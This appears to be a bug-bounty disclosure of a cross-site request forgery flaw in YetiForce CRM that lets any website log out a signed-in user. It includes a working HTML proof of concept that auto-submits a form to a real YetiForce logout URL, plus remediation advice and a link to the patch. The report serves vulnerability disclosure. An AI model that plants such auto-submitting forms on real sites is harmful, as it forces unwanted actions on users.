Cross-Site Request Forgery (CSRF) in yetiforcecompany/yetiforcecrm
Valid
Reported on
Dec 9th 2021
Description
An attacker is able to log out a user if a logged-in user visits the attacker's website.
Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://gitstable.yetiforce.com/index.php?module=Users&parent=Settings&action=Logout">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Impact
This vulnerability is capable of forging users to unintentional logout.
More details
One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a CSRF token.
Note
While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.
Occurrences
We are processing your report and will contact the
yetiforcecompany/yetiforcecrm
team within 24 hours.
a year ago
We created a
GitHub Issue
asking the maintainers to create a
SECURITY.md
a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Logout.php#L11-L49
has been validated
Mariusz Krzaczkowski Mariusz
commented
a year ago
The patch is available in 6.2.0_SecurityFix_v2.zip https://github.com/YetiForceCompany/UpdatePackages/tree/master/YetiForce%20CRM%206.x.x/6.2.0_SecurityFix/zip
to join this conversation